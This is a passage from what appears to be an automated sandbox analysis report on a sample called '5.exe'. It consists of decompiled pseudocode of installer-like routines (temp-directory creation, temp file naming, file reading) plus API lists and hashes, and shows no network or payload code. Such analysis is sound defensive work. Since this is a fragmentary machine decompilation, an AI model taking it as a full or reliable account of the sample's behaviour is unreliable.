                                                                                              					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                                                                                              						FreeLibrary(_t29);
                                                                                              					}
                                                                                              					goto L15;
                                                                                              				}
                                                                                              				_t25 = GetModuleHandleA(_t31); // executed
                                                                                              				_t29 = _t25;
                                                                                              				if(_t29 != __ebx) {
                                                                                              					goto L4;
                                                                                              				}
                                                                                              				goto L3;
                                                                                              			}











                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                                • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                                • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B694,7519EA30), ref: 00404D25
                                                                                                • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D5D
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D77
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D85
                                                                                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                              • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                              • String ID: B
                                                                                              • API String ID: 2987980305-3806887055
                                                                                              • Opcode ID: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                                                                              • Instruction ID: a273586f2596c922aa8c6de030caecb0164783ff06d74c4b05909b62d3698487
                                                                                              • Opcode Fuzzy Hash: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                                                                              • Instruction Fuzzy Hash: AA11EB72908215E7CF107FA5CD89EAE75B06B40359F20423BF611B62E0C77D4941D65E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                                                                              				struct _SECURITY_ATTRIBUTES** _t10;
                                                                                              				int _t19;
                                                                                              				struct _SECURITY_ATTRIBUTES* _t20;
                                                                                              				signed char _t22;
                                                                                              				struct _SECURITY_ATTRIBUTES* _t23;
                                                                                              				CHAR* _t25;
                                                                                              				struct _SECURITY_ATTRIBUTES** _t29;
                                                                                              				void* _t30;
                                                                                              
                                                                                              				_t23 = __ebx;
                                                                                              				_t25 = E004029E8(0xfffffff0);
                                                                                              				_t10 = E004054B2(_t25);
                                                                                              				_t27 = _t10;
                                                                                              				if(_t10 != __ebx) {
                                                                                              					do {
                                                                                              						_t29 = E00405449(_t27, 0x5c);
                                                                                              						 *_t29 = _t23;
                                                                                              						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                                              						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                                              						if(_t19 == 0) {
                                                                                              							if(GetLastError() != 0xb7) {
                                                                                              								L4:
                                                                                              								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                                              							} else {
                                                                                              								_t22 = GetFileAttributesA(_t25); // executed
                                                                                              								if((_t22 & 0x00000010) == 0) {
                                                                                              									goto L4;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                                              						 *_t29 = _t20;
                                                                                              						_t27 =  &(_t29[0]);
                                                                                              					} while (_t20 != _t23);
                                                                                              				}
                                                                                              				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                                              					_push(0xfffffff5);
                                                                                              					E00401423();
                                                                                              				} else {
                                                                                              					E00401423(0xffffffe6);
                                                                                              					E0040592B("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
                                                                                              					SetCurrentDirectoryA(_t25); // executed
                                                                                              				}
                                                                                              				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                                                                                              				return 0;
                                                                                              			}












                                                                                              APIs
                                                                                                • Part of subcall function 004054B2: CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004054C0
                                                                                                • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
                                                                                                • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4
                                                                                              • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                              • API String ID: 3751793516-1943935188
                                                                                              • Opcode ID: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                                                                              • Instruction ID: 0fc8515a6fa1eb0c4cba02d173a6c2760af3d5d18bb88fe9e963a679bbf3bb3f
                                                                                              • Opcode Fuzzy Hash: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                                                                              • Instruction Fuzzy Hash: 98012631908140ABDB117FB62C44EBF2BB0EE56365728063FF491B22E2C23C4842D62E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                              				signed int _t11;
                                                                                              				int _t14;
                                                                                              				signed int _t16;
                                                                                              				void* _t19;
                                                                                              				CHAR* _t20;
                                                                                              
                                                                                              				_t20 = _a4;
                                                                                              				_t19 = 0x64;
                                                                                              				while(1) {
                                                                                              					_t19 = _t19 - 1;
                                                                                              					_a4 = 0x61736e;
                                                                                              					_t11 = GetTickCount();
                                                                                              					_t16 = 0x1a;
                                                                                              					_a6 = _a6 + _t11 % _t16;
                                                                                              					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                                              					if(_t14 != 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					if(_t19 != 0) {
                                                                                              						continue;
                                                                                              					}
                                                                                              					 *_t20 =  *_t20 & 0x00000000;
                                                                                              					return _t14;
                                                                                              				}
                                                                                              				return _t20;
                                                                                              			}









                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00405644
                                                                                              • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 0040565E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: "C:\Users\user\Desktop\5.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                              • API String ID: 1716503409-881443968
                                                                                              • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                              • Instruction ID: 4df4b8b99f59c83ab7109897de74f33533764e09c55b4925cc875bb6e1137cb6
                                                                                              • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                              • Instruction Fuzzy Hash: 20F020323082087BEB104E19EC04F9B7FA9DF91760F14C02BFA48AA1C0C2B1994887A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F1F2997
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 0d7919dc4beb76136a7a5fa3f881afd0abca99c410f216f4a75ed7b6ad1ee447
                                                                                              • Instruction ID: 940ece8bc827d5b6ebe452b1f4c9c40ae2b68e94af4902d2413f25fb98269230
                                                                                              • Opcode Fuzzy Hash: 0d7919dc4beb76136a7a5fa3f881afd0abca99c410f216f4a75ed7b6ad1ee447
                                                                                              • Instruction Fuzzy Hash: E4714A35E50388EADF60CBE4E911BEDB7B5BF48750F20851AE618EB2E0E7701A51DB05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 69%
                                                                                              			E00401389(signed int _a4) {
                                                                                              				intOrPtr* _t6;
                                                                                              				void* _t8;
                                                                                              				void* _t10;
                                                                                              				signed int _t11;
                                                                                              				void* _t12;
                                                                                              				intOrPtr _t15;
                                                                                              				signed int _t16;
                                                                                              				signed int _t17;
                                                                                              				void* _t18;
                                                                                              
                                                                                              				_t17 = _a4;
                                                                                              				while(_t17 >= 0) {
                                                                                              					_t15 =  *0x42eb90; // 0x654724
                                                                                              					_t6 = _t17 * 0x1c + _t15;
                                                                                              					if( *_t6 == 1) {
                                                                                              						break;
                                                                                              					}
                                                                                              					_push(_t6); // executed
                                                                                              					_t8 = E00401434(); // executed
                                                                                              					if(_t8 == 0x7fffffff) {
                                                                                              						return 0x7fffffff;
                                                                                              					}
                                                                                              					_t10 = E0040136D(_t8);
                                                                                              					if(_t10 != 0) {
                                                                                              						_t11 = _t10 - 1;
                                                                                              						_t16 = _t17;
                                                                                              						_t17 = _t11;
                                                                                              						_t12 = _t11 - _t16;
                                                                                              					} else {
                                                                                              						_t12 = _t10 + 1;
                                                                                              						_t17 = _t17 + 1;
                                                                                              					}
                                                                                              					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                              						 *0x42e34c =  *0x42e34c + _t12;
                                                                                              						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
                                                                                              					}
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}













                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageA.USER32 ref: 004013F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: $Ge
                                                                                              • API String ID: 3850602802-1122335547
                                                                                              • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                                                                              • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
                                                                                              • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                                                                              • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 84%
                                                                                              			E004030AF(void* __eflags) {
                                                                                              				void* _t2;
                                                                                              				void* _t5;
                                                                                              				CHAR* _t6;
                                                                                              
                                                                                              				_t6 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                                                                                              				E00405B89(_t6);
                                                                                              				_t2 = E0040548B(_t6);
                                                                                              				if(_t2 != 0) {
                                                                                              					E0040541E(_t6);
                                                                                              					CreateDirectoryA(_t6, 0); // executed
                                                                                              					_t5 = E00405631("1033", _t6); // executed
                                                                                              					return _t5;
                                                                                              				} else {
                                                                                              					return _t2;
                                                                                              				}
                                                                                              			}







                                                                                              APIs
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                                • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 4115351271-2030658151
                                                                                              • Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                                                                              • Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
                                                                                              • Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                                                                              • Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 68%
                                                                                              			E00405602(CHAR* _a4, long _a8, long _a12) {
                                                                                              				signed int _t5;
                                                                                              				void* _t6;
                                                                                              
                                                                                              				_t5 = GetFileAttributesA(_a4); // executed
                                                                                              				asm("sbb ecx, ecx");
                                                                                              				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                              				return _t6;
                                                                                              			}






                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNEL32(00000003,00402C4B,C:\Users\user\Desktop\5.exe,80000000,00000003), ref: 00405606
                                                                                              • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                              • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                                                              • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                              • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004055E3(CHAR* _a4) {
                                                                                              				signed char _t3;
                                                                                              
                                                                                              				_t3 = GetFileAttributesA(_a4); // executed
                                                                                              				if(_t3 != 0xffffffff) {
                                                                                              					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                              				}
                                                                                              				return _t3;
                                                                                              			}





                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNEL32(?,004053EE,?,?,?), ref: 004055E7
                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                              • Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
                                                                                              • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                              • Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00403066(void* _a4, long _a8) {
                                                                                              				int _t6;
                                                                                              				long _t10;
                                                                                              
                                                                                              				_t10 = _a8;
                                                                                              				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                                                                                              				if(_t6 == 0 || _a8 != _t10) {
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					return 1;
                                                                                              				}
                                                                                              			}






                                                                                              APIs
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,00402E93,000000FF,00000004,00000000,00000000,00000000), ref: 0040307D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                                                              • Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
                                                                                              • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                                                              • Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00403098(long _a4) {
                                                                                              				long _t2;
                                                                                              
                                                                                              				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                                                                                              				return _t2;
                                                                                              			}





                                                                                              APIs
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00402DD2,00033FE4), ref: 004030A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                                                              • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                                                                                              • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                                                              • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405449(CHAR* _a4, intOrPtr _a8) {
                                                                                              				CHAR* _t3;
                                                                                              				char _t4;
                                                                                              
                                                                                              				_t3 = _a4;
                                                                                              				while(1) {
                                                                                              					_t4 =  *_t3;
                                                                                              					if(_t4 == 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					if(_t4 != _a8) {
                                                                                              						_t3 = CharNextA(_t3); // executed
                                                                                              						continue;
                                                                                              					}
                                                                                              					break;
                                                                                              				}
                                                                                              				return _t3;
                                                                                              			}






                                                                                              APIs
                                                                                              • CharNextA.USER32(?,0040318E,"C:\Users\user\Desktop\5.exe" ,00000020), ref: 00405456
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CharNext
                                                                                              • String ID:
                                                                                              • API String ID: 3213498283-0
                                                                                              • Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                              • Instruction ID: cdd2aa403d07c31b3ee0935f840b55cc407e0efebad9d97fc36691482a7c56ad
                                                                                              • Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                              • Instruction Fuzzy Hash: 09C0802444C64077C510572045247EB7FF0EA51342F58C457F4C163251C134ACC48F37
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              C-Code - Quality: 96%
                                                                                              			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                              				struct HWND__* _v8;
                                                                                              				long _v12;
                                                                                              				struct tagRECT _v28;
                                                                                              				void* _v36;
                                                                                              				signed int _v40;
                                                                                              				int _v44;
                                                                                              				int _v48;
                                                                                              				signed int _v52;
                                                                                              				int _v56;
                                                                                              				void* _v60;
                                                                                              				void* _v68;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				long _t87;
                                                                                              				unsigned int _t92;
                                                                                              				unsigned int _t93;
                                                                                              				int _t94;
                                                                                              				int _t95;
                                                                                              				long _t98;
                                                                                              				void* _t101;
                                                                                              				intOrPtr _t123;
                                                                                              				struct HWND__* _t127;
                                                                                              				int _t149;
                                                                                              				int _t150;
                                                                                              				struct HWND__* _t154;
                                                                                              				struct HWND__* _t158;
                                                                                              				struct HMENU__* _t160;
                                                                                              				long _t162;
                                                                                              				void* _t163;
                                                                                              				short* _t164;
                                                                                              
                                                                                              				_t154 =  *0x42e344; // 0x0
                                                                                              				_t149 = 0;
                                                                                              				_v8 = _t154;
                                                                                              				if(_a8 != 0x110) {
                                                                                              					__eflags = _a8 - 0x405;
                                                                                              					if(_a8 == 0x405) {
                                                                                              						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                                              					}
                                                                                              					__eflags = _a8 - 0x111;
                                                                                              					if(_a8 != 0x111) {
                                                                                              						L17:
                                                                                              						__eflags = _a8 - 0x404;
                                                                                              						if(_a8 != 0x404) {
                                                                                              							L25:
                                                                                              							__eflags = _a8 - 0x7b;
                                                                                              							if(_a8 != 0x7b) {
                                                                                              								goto L20;
                                                                                              							}
                                                                                              							__eflags = _a12 - _t154;
                                                                                              							if(_a12 != _t154) {
                                                                                              								goto L20;
                                                                                              							}
